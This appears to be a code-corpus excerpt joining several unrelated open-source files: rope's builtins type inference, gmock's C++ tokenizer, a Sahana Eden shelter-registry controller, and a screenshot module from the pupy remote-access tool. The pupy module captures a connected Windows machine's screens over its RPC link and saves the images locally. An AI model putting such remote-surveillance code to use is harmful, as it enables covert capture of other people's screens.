super(List, self).__init__(list, collector.attributes)
def _new_list(self, args):
return _create_builtin(args, get_list)
def _list_add(self, context):
if self.holding is not None:
return
holding = context.get_argument('value')
if holding is not None and holding != pyobjects.get_unknown():
context.save_per_name(holding)
def _self_set(self, context):
if self.holding is not None:
return
iterable = context.get_pyname('iterable')
holding = _infer_sequence_for_pyname(iterable)
if holding is not None and holding != pyobjects.get_unknown():
context.save_per_name(holding)
def _list_get(self, context):
if self.holding is not None:
return self.holding
return context.get_per_name()
def _iterator_get(self, context):
return get_iterator(self._list_get(context))
def _self_get(self, context):
return get_list(self._list_get(context))
get_list = _create_builtin_getter(List)
get_list_type = _create_builtin_type_getter(List)
class Dict(BuiltinClass):
def __init__(self, keys=None, values=None):
self.keys = keys
self.values = values
item = get_tuple(self.keys, self.values)
collector = _AttributeCollector(dict)
collector('__new__', function=self._new_dict)
collector('__setitem__', function=self._dict_add)
collector('popitem', function=self._item_get)
collector('pop', function=self._value_get)
collector('get', function=self._key_get)
collector('keys', function=self._key_list)
collector('values', function=self._value_list)
collector('items', function=self._item_list)
collector('copy', function=self._self_get)
collector('__getitem__', function=self._value_get)
collector('__iter__', function=self._key_iter)
collector('update', function=self._self_set)
super(Dict, self).__init__(dict, collector.attributes)
def _new_dict(self, args):
def do_create(holding=None):
if holding is None:
return get_dict()
type = holding.get_type()
if isinstance(type, Tuple) and len(type.get_holding_objects()) == 2:
return get_dict(*type.get_holding_objects())
return _create_builtin(args, do_create)
def _dict_add(self, context):
if self.keys is not None:
return
key, value = context.get_arguments(['self', 'key', 'value'])[1:]
if key is not None and key != pyobjects.get_unknown():
context.save_per_name(get_tuple(key, value))
def _item_get(self, context):
if self.keys is not None:
return get_tuple(self.keys, self.values)
item = context.get_per_name()
if item is None or not isinstance(item.get_type(), Tuple):
return get_tuple(self.keys, self.values)
return item
def _value_get(self, context):
item = self._item_get(context).get_type()
return item.get_holding_objects()[1]
def _key_get(self, context):
item = self._item_get(context).get_type()
return item.get_holding_objects()[0]
def _value_list(self, context):
return get_list(self._value_get(context))
def _key_list(self, context):
return get_list(self._key_get(context))
def _item_list(self, context):
return get_list(self._item_get(context))
def _value_iter(self, context):
return get_iterator(self._value_get(context))
def _key_iter(self, context):
return get_iterator(self._key_get(context))
def _item_iter(self, context):
return get_iterator(self._item_get(context))
def _self_get(self, context):
item = self._item_get(context).get_type()
key, value = item.get_holding_objects()[:2]
return get_dict(key, value)
def _self_set(self, context):
if self.keys is not None:
return
new_dict = context.get_pynames(['self', 'd'])[1]
if new_dict and isinstance(new_dict.get_object().get_type(), Dict):
args = arguments.ObjectArguments([new_dict])
items = new_dict.get_object()['popitem'].\
get_object().get_returned_object(args)
context.save_per_name(items)
else:
holding = _infer_sequence_for_pyname(new_dict)
if holding is not None and isinstance(holding.get_type(), Tuple):
context.save_per_name(holding)
get_dict = _create_builtin_getter(Dict)
get_dict_type = _create_builtin_type_getter(Dict)
class Tuple(BuiltinClass):
def __init__(self, *objects):
self.objects = objects
first = None
if objects:
first = objects[0]
attributes = {
'__getitem__': BuiltinName(BuiltinFunction(first)),
'__getslice__': BuiltinName(BuiltinFunction(pyobjects.PyObject(self))),
'__new__': BuiltinName(BuiltinFunction(function=self._new_tuple)),
'__iter__': BuiltinName(BuiltinFunction(get_iterator(first)))}
super(Tuple, self).__init__(tuple, attributes)
def get_holding_objects(self):
return self.objects
def _new_tuple(self, args):
return _create_builtin(args, get_tuple)
get_tuple = _create_builtin_getter(Tuple)
get_tuple_type = _create_builtin_type_getter(Tuple)
class Set(BuiltinClass):
def __init__(self, holding=None):
self.holding = holding
collector = _AttributeCollector(set)
collector('__new__', function=self._new_set)
self_methods = ['copy', 'difference', 'intersection',
'symmetric_difference', 'union']
for method in self_methods:
collector(method, function=self._self_get)
collector('add', function=self._set_add)
collector('update', function=self._self_set)
collector('symmetric_difference_update', function=self._self_set)
collector('difference_update', function=self._self_set)
collector('pop', function=self._set_get)
collector('__iter__', function=self._iterator_get)
super(Set, self).__init__(set, collector.attributes)
def _new_set(self, args):
return _create_builtin(args, get_set)
def _set_add(self, context):
if self.holding is not None:
return
holding = context.get_arguments(['self', 'value'])[1]
if holding is not None and holding != pyobjects.get_unknown():
context.save_per_name(holding)
def _self_set(self, context):
if self.holding is not None:
return
iterable = context.get_pyname('iterable')
holding = _infer_sequence_for_pyname(iterable)
if holding is not None and holding != pyobjects.get_unknown():
context.save_per_name(holding)
def _set_get(self, context):
if self.holding is not None:
return self.holding
return context.get_per_name()
def _iterator_get(self, context):
return get_iterator(self._set_get(context))
def _self_get(self, context):
return get_list(self._set_get(context))
get_set = _create_builtin_getter(Set)
get_set_type = _create_builtin_type_getter(Set)
class Str(BuiltinClass):
def __init__(self):
self_object = pyobjects.PyObject(self)
collector = _AttributeCollector(str)
collector('__iter__', get_iterator(self_object), check_existence=False)
self_methods = ['__getitem__', '__getslice__', 'capitalize', 'center',
'decode', 'encode', 'expandtabs', 'join', 'ljust',
'lower', 'lstrip', 'replace', 'rjust', 'rstrip', 'strip',
'swapcase', 'title', 'translate', 'upper', 'zfill']
for method in self_methods:
collector(method, self_object)
for method in ['rsplit', 'split', 'splitlines']:
collector(method, get_list(self_object))
super(Str, self).__init__(str, collector.attributes)
def get_doc(self):
return str.__doc__
get_str = _create_builtin_getter(Str)
get_str_type = _create_builtin_type_getter(Str)
class BuiltinName(pynames.PyName):
def __init__(self, pyobject):
self.pyobject = pyobject
def get_object(self):
return self.pyobject
def get_definition_location(self):
return (None, None)
class Iterator(pyobjects.AbstractClass):
def __init__(self, holding=None):
super(Iterator, self).__init__()
self.holding = holding
self.attributes = {
'next': BuiltinName(BuiltinFunction(self.holding)),
'__iter__': BuiltinName(BuiltinFunction(self))}
def get_attributes(self):
return self.attributes
def get_returned_object(self, args):
return self.holding
get_iterator = _create_builtin_getter(Iterator)
class Generator(pyobjects.AbstractClass):
def __init__(self, holding=None):
super(Generator, self).__init__()
self.holding = holding
self.attributes = {
'next': BuiltinName(BuiltinFunction(self.holding)),
'__iter__': BuiltinName(BuiltinFunction(get_iterator(self.holding))),
'close': BuiltinName(BuiltinFunction()),
'send': BuiltinName(BuiltinFunction()),
'throw': BuiltinName(BuiltinFunction())}
def get_attributes(self):
return self.attributes
def get_returned_object(self, args):
return self.holding
get_generator = _create_builtin_getter(Generator)
class File(BuiltinClass):
def __init__(self):
self_object = pyobjects.PyObject(self)
str_object = get_str()
str_list = get_list(get_str())
attributes = {}
def add(name, returned=None, function=None):
builtin = getattr(file, name, None)
attributes[name] = BuiltinName(
BuiltinFunction(returned=returned, function=function,
builtin=builtin))
add('__iter__', get_iterator(str_object))
for method in ['next', 'read', 'readline', 'readlines']:
add(method, str_list)
for method in ['close', 'flush', 'lineno', 'isatty', 'seek', 'tell',
'truncate', 'write', 'writelines']:
add(method)
super(File, self).__init__(file, attributes)
get_file = _create_builtin_getter(File)
get_file_type = _create_builtin_type_getter(File)
class Property(BuiltinClass):
def __init__(self, fget=None, fset=None, fdel=None, fdoc=None):
self._fget = fget
self._fdoc = fdoc
attributes = {
'fget': BuiltinName(BuiltinFunction()),
'fset': BuiltinName(pynames.UnboundName()),
'fdel': BuiltinName(pynames.UnboundName()),
'__new__': BuiltinName(BuiltinFunction(function=_property_function))}
super(Property, self).__init__(property, attributes)
def get_property_object(self, args):
if isinstance(self._fget, pyobjects.AbstractFunction):
return self._fget.get_returned_object(args)
def _property_function(args):
parameters = args.get_arguments(['fget', 'fset', 'fdel', 'fdoc'])
return pyobjects.PyObject(Property(parameters[0]))
class Lambda(pyobjects.AbstractFunction):
def __init__(self, node, scope):
super(Lambda, self).__init__()
self.node = node
self.scope = scope
def get_returned_object(self, args):
result = rope.base.evaluate.eval_node(self.scope, self.node.body)
if result is not None:
return result.get_object()
else:
return pyobjects.get_unknown()
    def get_attributes(self):
        return {}
class BuiltinObject(BuiltinClass):
def __init__(self):
super(BuiltinObject, self).__init__(object, {})
class BuiltinType(BuiltinClass):
def __init__(self):
super(BuiltinType, self).__init__(type, {})
def _infer_sequence_for_pyname(pyname):
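    # Infers what an iterable pyname holds by asking its __iter__ attribute
    # for the iterator and the iterator's next() for the element type;
    # returns None when the object is missing or the chain cannot be followed.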
if pyname is None:
return None
seq = pyname.get_object()
args = arguments.ObjectArguments([pyname])
if '__iter__' in seq:
iter = seq['__iter__'].get_object().\
get_returned_object(args)
if iter is not None and 'next' in iter:
holding = iter['next'].get_object().\
get_returned_object(args)
return holding
def _create_builtin(args, creator):
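    # Shared constructor helper: if the single `sequence` argument can be
    # inferred to hold something, build the container around that element
    # type, otherwise build an empty container.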
passed = args.get_pynames(['sequence'])[0]
if passed is None:
holding = None
else:
holding = _infer_sequence_for_pyname(passed)
if holding is not None:
return creator(holding)
else:
return creator()
def _range_function(args):
return get_list()
def _reversed_function(args):
return _create_builtin(args, get_iterator)
def _sorted_function(args):
return _create_builtin(args, get_list)
def _super_function(args):
passed_class, passed_self = args.get_arguments(['type', 'self'])
if passed_self is None:
return passed_class
else:
#pyclass = passed_self.get_type()
pyclass = passed_class
if isinstance(pyclass, pyobjects.AbstractClass):
supers = pyclass.get_superclasses()
if supers:
return pyobjects.PyObject(supers[0])
return passed_self
def _zip_function(args):
args = args.get_pynames(['sequence'])
objects = []
for seq in args:
if seq is None:
holding = None
else:
holding = _infer_sequence_for_pyname(seq)
objects.append(holding)
tuple = get_tuple(*objects)
return get_list(tuple)
def _enumerate_function(args):
passed = args.get_pynames(['sequence'])[0]
if passed is None:
holding = None
else:
holding = _infer_sequence_for_pyname(passed)
tuple = get_tuple(None, holding)
return get_iterator(tuple)
def _iter_function(args):
passed = args.get_pynames(['sequence'])[0]
if passed is None:
holding = None
else:
holding = _infer_sequence_for_pyname(passed)
return get_iterator(holding)
def _input_function(args):
return get_str()
_initial_builtins = {
'list': BuiltinName(get_list_type()),
'dict': BuiltinName(get_dict_type()),
'tuple': BuiltinName(get_tuple_type()),
'set': BuiltinName(get_set_type()),
'str': BuiltinName(get_str_type()),
'file': BuiltinName(get_file_type()),
'open': BuiltinName(get_file_type()),
'unicode': BuiltinName(get_str_type()),
'range': BuiltinName(BuiltinFunction(function=_range_function, builtin=range)),
'reversed': BuiltinName(BuiltinFunction(function=_reversed_function, builtin=reversed)),
'sorted': BuiltinName(BuiltinFunction(function=_sorted_function, builtin=sorted)),
'super': BuiltinName(BuiltinFunction(function=_super_function, builtin=super)),
'property': BuiltinName(BuiltinFunction(function=_property_function, builtin=property)),
'zip': BuiltinName(BuiltinFunction(function=_zip_function, builtin=zip)),
'enumerate': BuiltinName(BuiltinFunction(function=_enumerate_function, builtin=enumerate)),
'object': BuiltinName(BuiltinObject()),
'type': BuiltinName(BuiltinType()),
'iter': BuiltinName(BuiltinFunction(function=_iter_function, builtin=iter)),
'raw_input': BuiltinName(BuiltinFunction(function=_input_function, builtin=raw_input)),
}
builtins = BuiltinModule('__builtin__', initial=_initial_builtins)
| mit |
w-martin/tact | gmock/scripts/generator/cpp/tokenize.py | 679 | 9703 | #!/usr/bin/env python
#
# Copyright 2007 Neal Norwitz
# Portions Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenize C++ source code."""
__author__ = '[email protected] (Neal Norwitz)'
try:
# Python 3.x
import builtins
except ImportError:
# Python 2.x
import __builtin__ as builtins
import sys
from cpp import utils
if not hasattr(builtins, 'set'):
# Nominal support for Python 2.3.
from sets import Set as set
# Add $ as a valid identifier char since so much code uses it.
_letters = 'abcdefghijklmnopqrstuvwxyz'
VALID_IDENTIFIER_CHARS = set(_letters + _letters.upper() + '_0123456789$')
HEX_DIGITS = set('0123456789abcdefABCDEF')
INT_OR_FLOAT_DIGITS = set('01234567890eE-+')
# C++0x string prefixes.
_STR_PREFIXES = set(('R', 'u8', 'u8R', 'u', 'uR', 'U', 'UR', 'L', 'LR'))
# Token types.
UNKNOWN = 'UNKNOWN'
SYNTAX = 'SYNTAX'
CONSTANT = 'CONSTANT'
NAME = 'NAME'
PREPROCESSOR = 'PREPROCESSOR'
# Where the token originated from. This can be used for backtracking.
# It is always set to WHENCE_STREAM in this code.
WHENCE_STREAM, WHENCE_QUEUE = range(2)
class Token(object):
"""Data container to represent a C++ token.
Tokens can be identifiers, syntax char(s), constants, or
pre-processor directives.
start contains the index of the first char of the token in the source
end contains the index of the last char of the token in the source
"""
def __init__(self, token_type, name, start, end):
self.token_type = token_type
self.name = name
self.start = start
self.end = end
self.whence = WHENCE_STREAM
def __str__(self):
if not utils.DEBUG:
return 'Token(%r)' % self.name
return 'Token(%r, %s, %s)' % (self.name, self.start, self.end)
__repr__ = __str__
def _GetString(source, start, i):
i = source.find('"', i+1)
while source[i-1] == '\\':
# Count the trailing backslashes.
backslash_count = 1
j = i - 2
while source[j] == '\\':
backslash_count += 1
j -= 1
# When trailing backslashes are even, they escape each other.
if (backslash_count % 2) == 0:
break
i = source.find('"', i+1)
return i + 1
def _GetChar(source, start, i):
# NOTE(nnorwitz): may not be quite correct, should be good enough.
i = source.find("'", i+1)
while source[i-1] == '\\':
# Need to special case '\\'.
if (i - 2) > start and source[i-2] == '\\':
break
i = source.find("'", i+1)
# Try to handle unterminated single quotes (in a #if 0 block).
if i < 0:
i = start
return i + 1
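# Illustrative example (not part of the original file): for the input
# "int x;", GetTokens below yields Token(NAME, 'int', 0, 3),
# Token(NAME, 'x', 4, 5) and Token(SYNTAX, ';', 5, 6).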
def GetTokens(source):
"""Returns a sequence of Tokens.
Args:
source: string of C++ source code.
Yields:
Token that represents the next token in the source.
"""
# Cache various valid character sets for speed.
valid_identifier_chars = VALID_IDENTIFIER_CHARS
hex_digits = HEX_DIGITS
int_or_float_digits = INT_OR_FLOAT_DIGITS
int_or_float_digits2 = int_or_float_digits | set('.')
# Only ignore errors while in a #if 0 block.
ignore_errors = False
count_ifs = 0
i = 0
end = len(source)
while i < end:
# Skip whitespace.
while i < end and source[i].isspace():
i += 1
if i >= end:
return
token_type = UNKNOWN
start = i
c = source[i]
if c.isalpha() or c == '_': # Find a string token.
token_type = NAME
while source[i] in valid_identifier_chars:
i += 1
# String and character constants can look like a name if
# they are something like L"".
if (source[i] == "'" and (i - start) == 1 and
source[start:i] in 'uUL'):
# u, U, and L are valid C++0x character preffixes.
token_type = CONSTANT
i = _GetChar(source, start, i)
elif source[i] == "'" and source[start:i] in _STR_PREFIXES:
token_type = CONSTANT
i = _GetString(source, start, i)
elif c == '/' and source[i+1] == '/': # Find // comments.
i = source.find('\n', i)
if i == -1: # Handle EOF.
i = end
continue
elif c == '/' and source[i+1] == '*': # Find /* comments. */
i = source.find('*/', i) + 2
continue
elif c in ':+-<>&|*=': # : or :: (plus other chars).
token_type = SYNTAX
i += 1
new_ch = source[i]
if new_ch == c:
i += 1
elif c == '-' and new_ch == '>':
i += 1
elif new_ch == '=':
i += 1
elif c in '()[]{}~!?^%;/.,': # Handle single char tokens.
token_type = SYNTAX
i += 1
if c == '.' and source[i].isdigit():
token_type = CONSTANT
i += 1
while source[i] in int_or_float_digits:
i += 1
# Handle float suffixes.
for suffix in ('l', 'f'):
if suffix == source[i:i+1].lower():
i += 1
break
elif c.isdigit(): # Find integer.
token_type = CONSTANT
if c == '0' and source[i+1] in 'xX':
# Handle hex digits.
i += 2
while source[i] in hex_digits:
i += 1
else:
while source[i] in int_or_float_digits2:
i += 1
# Handle integer (and float) suffixes.
for suffix in ('ull', 'll', 'ul', 'l', 'f', 'u'):
size = len(suffix)
if suffix == source[i:i+size].lower():
i += size
break
elif c == '"': # Find string.
token_type = CONSTANT
i = _GetString(source, start, i)
elif c == "'": # Find char.
token_type = CONSTANT
i = _GetChar(source, start, i)
elif c == '#': # Find pre-processor command.
token_type = PREPROCESSOR
got_if = source[i:i+3] == '#if' and source[i+3:i+4].isspace()
if got_if:
count_ifs += 1
elif source[i:i+6] == '#endif':
count_ifs -= 1
if count_ifs == 0:
ignore_errors = False
# TODO(nnorwitz): handle preprocessor statements (\ continuations).
while 1:
i1 = source.find('\n', i)
i2 = source.find('//', i)
i3 = source.find('/*', i)
i4 = source.find('"', i)
# NOTE(nnorwitz): doesn't handle comments in #define macros.
# Get the first important symbol (newline, comment, EOF/end).
i = min([x for x in (i1, i2, i3, i4, end) if x != -1])
# Handle #include "dir//foo.h" properly.
if source[i] == '"':
i = source.find('"', i+1) + 1
assert i > 0
continue
# Keep going if end of the line and the line ends with \.
if not (i == i1 and source[i-1] == '\\'):
if got_if:
condition = source[start+4:i].lstrip()
if (condition.startswith('0') or
condition.startswith('(0)')):
ignore_errors = True
break
i += 1
elif c == '\\': # Handle \ in code.
# This is different from the pre-processor \ handling.
i += 1
continue
elif ignore_errors:
# The tokenizer seems to be in pretty good shape. This
# raise is conditionally disabled so that bogus code
# in an #if 0 block can be handled. Since we will ignore
# it anyways, this is probably fine. So disable the
# exception and return the bogus char.
i += 1
else:
sys.stderr.write('Got invalid token in %s @ %d token:%s: %r\n' %
('?', i, c, source[i-10:i+10]))
raise RuntimeError('unexpected token')
if i <= 0:
print('Invalid index, exiting now.')
return
yield Token(token_type, source[start:i], start, i)
if __name__ == '__main__':
def main(argv):
"""Driver mostly for testing purposes."""
for filename in argv[1:]:
source = utils.ReadFile(filename)
if source is None:
continue
for token in GetTokens(source):
print('%-12s: %s' % (token.token_type, token.name))
# print('\r%6.2f%%' % (100.0 * index / token.end),)
sys.stdout.write('\n')
main(sys.argv)
| gpl-3.0 |
benjamin-jones/pupy | pupy/modules/screenshot.py | 27 | 3951 | # -*- coding: UTF8 -*-
# --------------------------------------------------------------
# Copyright (c) 2015, Nicolas VERDIER ([email protected])
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
# --------------------------------------------------------------
from pupylib.PupyModule import *
from rpyc.utils.classic import download
import os
import os.path
import textwrap
import logging
import datetime
from zlib import compress, crc32
import struct
import subprocess
__class_name__="Screenshoter"
def pil_save(filename, pixels, width, height):
from PIL import Image, ImageFile
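    # (width * 3 + 3) & -4 rounds the RGB row size up to the next multiple of
    # four bytes, matching the 4-byte scanline alignment of Windows DIB data.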
buffer_len = (width * 3 + 3) & -4
img = Image.frombuffer('RGB', (width, height), pixels, 'raw', 'BGR', buffer_len, 1)
ImageFile.MAXBLOCK = width * height
img=img.transpose(Image.FLIP_TOP_BOTTOM)
img.save(filename, quality=95, optimize=True, progressive=True)
logging.info('Screenshot saved to %s'%filename)
class Screenshoter(PupyModule):
""" take a screenshot :) """
@windows_only
def is_compatible(self):
pass
def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog='screenshot', description=self.__doc__)
self.arg_parser.add_argument('-e', '--enum', action='store_true', help='enumerate screen')
self.arg_parser.add_argument('-s', '--screen', type=int, default=None, help='take a screenshot on a specific screen (default all screen on one screenshot)')
self.arg_parser.add_argument('-v', '--view', action='store_true', help='directly open eog on the screenshot for preview')
def run(self, args):
try:
os.makedirs("./data/screenshots")
except Exception:
pass
self.client.load_package("pupwinutils.screenshot")
screens=None
if args.screen is None:
screens=self.client.conn.modules['pupwinutils.screenshot'].enum_display_monitors(oneshot=True)
else:
screens=self.client.conn.modules['pupwinutils.screenshot'].enum_display_monitors()
if args.enum:
res=""
for i, screen in enumerate(screens):
res+="{:<3}: {}\n".format(i,screen)
return res
if args.screen is None:
args.screen=0
selected_screen=screens[args.screen]
screenshot_pixels=self.client.conn.modules["pupwinutils.screenshot"].get_pixels(selected_screen)
filepath=os.path.join("./data/screenshots","scr_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".jpg")
pil_save(filepath, screenshot_pixels, selected_screen["width"], selected_screen["height"])
if args.view:
subprocess.Popen(["eog",filepath])
self.success("screenshot saved to %s"%filepath)
| bsd-3-clause |
flavour/cert | controllers/cr.py | 3 | 13875 | # -*- coding: utf-8 -*-
"""
Shelter Registry - Controllers
"""
# @ToDo Search shelters by type, services, location, available space
# @ToDo Tie in assessments from RAT and requests from RMS.
# @ToDo Associate persons with shelters (via presence loc == shelter loc?)
module = request.controller
resourcename = request.function
if module not in deployment_settings.modules:
raise HTTP(404, body="Module disabled: %s" % module)
# Load Models
s3mgr.load("cr_shelter")
# Options Menu (available in all Functions' Views)
s3_menu(module)
# S3 framework functions
# -----------------------------------------------------------------------------
def index():
""" Module's Home Page """
module_name = deployment_settings.modules[module].name_nice
response.title = module_name
return dict(module_name=module_name)
# =============================================================================
def shelter_type():
"""
RESTful CRUD controller
List / add shelter types (e.g. NGO-operated, Government evacuation center,
School, Hospital -- see Agasti opt_camp_type.)
"""
tabs = [(T("Basic Details"), None),
(s3.crud_strings["cr_shelter"].subtitle_list, "shelter")]
rheader = lambda r: response.s3.shelter_rheader(r,
tabs=tabs)
# @ToDo: Shelters per type display is broken -- always returns none.
output = s3_rest_controller(module, resourcename,
rheader=rheader)
return output
# -----------------------------------------------------------------------------
def shelter_service():
"""
RESTful CRUD controller
List / add shelter services (e.g. medical, housing, food, ...)
"""
tabs = [(T("Basic Details"), None),
(s3.crud_strings["cr_shelter"].subtitle_list, "shelter")]
rheader = lambda r: response.s3.shelter_rheader(r,
tabs=tabs)
output = s3_rest_controller(module, resourcename,
rheader=rheader)
return output
# =============================================================================
def shelter():
""" RESTful CRUD controller
>>> resource="shelter"
>>> from applications.sahana.modules.s3_test import WSGI_Test
>>> test=WSGI_Test(db)
>>> "200 OK" in test.getPage("/sahana/%s/%s" % (module,resource))
True
>>> test.assertHeader("Content-Type", "text/html")
>>> test.assertInBody("List Shelters")
>>> "200 OK" in test.getPage("/sahana/%s/%s/create" % (module,resource)) #doctest: +SKIP
True
>>> test.assertHeader("Content-Type", "text/html") #doctest: +SKIP
>>> test.assertInBody("Add Shelter") #doctest: +SKIP
>>> "200 OK" in test.getPage("/sahana/%s/%s?format=json" % (module,resource))
True
>>> test.assertHeader("Content-Type", "text/html")
>>> test.assertInBody("[")
>>> "200 OK" in test.getPage("/sahana/%s/%s?format=csv" % (module,resource))
True
>>> test.assertHeader("Content-Type", "text/csv")
"""
tablename = "cr_shelter"
table = db[tablename]
# Load Models to add tabs
if deployment_settings.has_module("inv"):
s3mgr.load("inv_inv_item")
elif deployment_settings.has_module("req"):
# (gets loaded by Inv if available)
s3mgr.load("req_req")
# Prepare the Presence table for use by Shelters
s3mgr.load("pr_presence")
field = db.pr_presence.shelter_id
field.requires = IS_NULL_OR(IS_ONE_OF(db, "cr_shelter.id",
"%(name)s",
sort=True))
field.represent = lambda id: \
(id and [db.cr_shelter[id].name] or ["None"])[0]
field.ondelete = "RESTRICT"
if deployment_settings.get_ui_camp():
HELP = T("The Camp this person is checking into.")
else:
HELP = T("The Shelter this person is checking into.")
ADD_SHELTER = response.s3.ADD_SHELTER
SHELTER_LABEL = response.s3.SHELTER_LABEL
field.comment = DIV(A(ADD_SHELTER,
_class="colorbox",
_href=URL(c="cr", f="shelter",
args="create",
vars=dict(format="popup")),
_target="top",
_title=ADD_SHELTER),
DIV( _class="tooltip",
_title="%s|%s" % (SHELTER_LABEL,
HELP)))
field.label = SHELTER_LABEL
field.readable = True
field.writable = True
# Make pr_presence.pe_id visible:
pe_id = db.pr_presence.pe_id
pe_id.readable = True
pe_id.writable = True
# Usually, the pe_id field is an invisible foreign key, therefore it
# has no default representation/requirements => need to add this here:
pe_id.label = T("Person/Group")
pe_id.represent = s3_pentity_represent
pe_id.requires = IS_ONE_OF(db, "pr_pentity.pe_id",
s3_pentity_represent,
filterby="instance_type",
orderby="instance_type",
filter_opts=("pr_person",
"pr_group"))
s3mgr.configure("pr_presence",
# presence not deletable in this view! (need to register a check-out
# for the same person instead):
deletable=False,
list_fields=["id",
"pe_id",
"datetime",
"presence_condition",
"proc_desc"
])
# Access from Shelters
s3mgr.model.add_component("pr_presence",
cr_shelter="shelter_id")
s3mgr.configure(tablename,
# Go to People check-in for this shelter after creation
create_next = URL(c="cr", f="shelter",
args=["[id]", "presence"]))
# Pre-processor
response.s3.prep = cr_shelter_prep
rheader = response.s3.shelter_rheader
output = s3_rest_controller(module, resourcename, rheader=rheader)
return output
# -----------------------------------------------------------------------------
def cr_shelter_prep(r):
"""
Pre-processor for the REST Controller
"""
if r.component and r.component.name == "presence":
r.resource.add_filter(db.pr_presence.closed == False)
if r.interactive:
if r.method != "read":
# Don't want to see in Create forms
# inc list_create (list_fields over-rides)
address_hide(r.table)
if r.component:
if r.component.name == "inv_item" or \
r.component.name == "recv" or \
r.component.name == "send":
# Filter out items which are already in this inventory
response.s3.inv_prep(r)
elif r.component.name == "human_resource":
# Filter out people which are already staff for this warehouse
s3_filter_staff(r)
# Cascade the organisation_id from the hospital to the staff
db.hrm_human_resource.organisation_id.default = r.record.organisation_id
db.hrm_human_resource.organisation_id.writable = False
elif r.component.name == "rat":
# Hide the Implied fields
db.assess_rat.location_id.writable = False
db.assess_rat.location_id.default = r.record.location_id
db.assess_rat.location_id.comment = ""
# Set defaults
if auth.is_logged_in():
query = (db.pr_person.uuid == session.auth.user.person_uuid) & \
(db.hrm_human_resource.person_id == db.pr_person.id)
staff_id = db(query).select(db.hrm_human_resource.id,
limitby=(0, 1)).first()
if staff_id:
db.assess_rat.staff_id.default = staff_id.id
elif r.component.name == "presence":
if deployment_settings.get_ui_camp():
REGISTER_LABEL = T("Register Person into this Camp")
EMPTY_LIST = T("No People currently registered in this camp")
else:
REGISTER_LABEL = T("Register Person into this Shelter")
EMPTY_LIST = T("No People currently registered in this shelter")
# Hide the Implied fields
db.pr_presence.location_id.writable = False
db.pr_presence.location_id.default = r.record.location_id
db.pr_presence.location_id.comment = ""
db.pr_presence.proc_desc.readable = db.pr_presence.proc_desc.writable = False
# AT: Add Person
db.pr_presence.pe_id.comment = \
DIV(s3_person_comment(T("Add Person"), REGISTER_LABEL),
DIV(A(s3.crud_strings.pr_group.label_create_button,
_class="colorbox",
_href=URL(c="pr", f="group", args="create",
vars=dict(format="popup")),
_target="top",
_title=s3.crud_strings.pr_group.label_create_button),
DIV(_class="tooltip",
_title="%s|%s" % (T("Create Group Entry"),
T("Create a group entry in the registry.")))
)
)
db.pr_presence.pe_id.widget = S3AutocompleteWidget("pr", "pentity")
# Set defaults
db.pr_presence.datetime.default = request.utcnow
db.pr_presence.observer.default = s3_logged_in_person()
cr_shelter_presence_opts = {
vita.CHECK_IN: vita.presence_conditions[vita.CHECK_IN],
vita.CHECK_OUT: vita.presence_conditions[vita.CHECK_OUT]}
db.pr_presence.presence_condition.requires = IS_IN_SET(
cr_shelter_presence_opts, zero=None)
db.pr_presence.presence_condition.default = vita.CHECK_IN
# Change the Labels
s3.crud_strings.pr_presence = Storage(
title_create = T("Register Person"),
title_display = T("Registration Details"),
title_list = T("Registered People"),
title_update = T("Edit Registration"),
title_search = T("Search Registations"),
subtitle_create = REGISTER_LABEL,
subtitle_list = T("Current Registrations"),
label_list_button = T("List Registrations"),
label_create_button = T("Register Person"),
msg_record_created = T("Registration added"),
msg_record_modified = T("Registration updated"),
msg_record_deleted = T("Registration entry deleted"),
msg_list_empty = EMPTY_LIST
)
elif r.component.name == "req":
if r.method != "update" and r.method != "read":
# Hide fields which don't make sense in a Create form
# inc list_create (list_fields over-rides)
response.s3.req_create_form_mods()
return True
# =============================================================================
def incoming():
""" Incoming Shipments """
s3mgr.load("inv_inv_item")
try:
return response.s3.inv_incoming()
except TypeError:
return None
# -----------------------------------------------------------------------------
def req_match():
""" Match Requests """
s3mgr.load("req_req")
try:
return response.s3.req_match()
except TypeError:
return None
# =============================================================================
# This code provides urls of the form:
# http://.../eden/cr/call/<service>/rpc/<method>/<id>
# e.g.:
# http://.../eden/cr/call/jsonrpc/rpc/list/2
# It is not currently in use but left in as an example, and because it may
# be used in future for interoperating with or transferring data from Agasti
# which uses xml-rpc. See:
# http://www.web2py.com/examples/default/tools#services
# http://groups.google.com/group/web2py/browse_thread/thread/53086d5f89ac3ae2
def call():
"Call an XMLRPC, JSONRPC or RSS service"
return service()
@service.jsonrpc
@service.xmlrpc
@service.amfrpc
def rpc(method, id=0):
if method == "list":
